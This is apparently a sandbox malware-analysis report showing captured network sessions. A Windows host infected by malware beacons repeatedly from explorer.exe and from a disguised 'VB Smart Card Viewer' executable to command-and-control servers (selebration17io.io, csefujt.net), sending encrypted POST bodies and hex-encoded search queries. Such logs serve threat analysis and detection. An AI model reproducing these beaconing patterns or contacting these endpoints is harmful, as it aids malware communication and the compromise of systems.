Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                104192.168.2.64984691.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:31.889816046 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://fckyfgpcdvk.com/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 304
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:14:31.889862061 CET | 304 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8e b3 3f d6
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO?02*lyd*}aXegzHnF.*"])b-U.\6;$Gswd)G1Zr7E\2W'1j6%?{?
Feb 5, 2024 12:14:32.142455101 CET | 194 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:32 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.6 | 49847 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:32.169811964 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:32.413049936 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:32 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.6 | 49848 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:32.760178089 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:32.996984005 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:32 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.6 | 49849 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:33.355777979 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:33.600907087 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:33 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.6 | 49850 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:33.977843046 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:34.220473051 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:34 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.6 | 49851 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:34.581547976 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:34.818738937 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:34 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.6 | 49852 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:35.158407927 CET | 287 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://hkijxgsqrcqnlfn.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 299
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:14:35.158482075 CET | 299 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 aa a6 3b c8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO;"$M^bmxx>WrE`jl/a.H,;1/e# `iy?olv{#x!hbB1_xf8mfFFr}{+8Zq
Feb 5, 2024 12:14:35.416320086 CET | 194 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:35 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.6 | 49853 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:35.162345886 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:35.408040047 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:35 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.6 | 49854 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:35.753498077 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:35.990385056 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:35 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.6 | 49855 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:36.326859951 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:36.569446087 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:36 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.6 | 49856 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:36.920476913 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:37.164222956 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:37 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.6 | 49857 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:37.544146061 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:37.780312061 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.6 | 49858 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:38.140150070 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:38.383191109 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.6 | 49859 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:38.743875980 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:38.980588913 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.6 | 49860 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:39.325793982 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:39.567667007 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.6 | 49861 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:39.906076908 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:40.148735046 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.6 | 49862 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:40.353662014 CET | 283 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qpvffufpuvb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 196
Host: selebration17io.io
Feb 5, 2024 12:14:40.353707075 CET | 196 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8f a5 23 de
Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO#ft:=ieoaFO0.~0!cw))JnDDLW(bygW53z_/#
Feb 5, 2024 12:14:40.606726885 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:14:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.6 | 49863 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:40.502882004 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:40.739677906 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.6 | 49864 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:41.071656942 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:41.315661907 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.6 | 49865 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
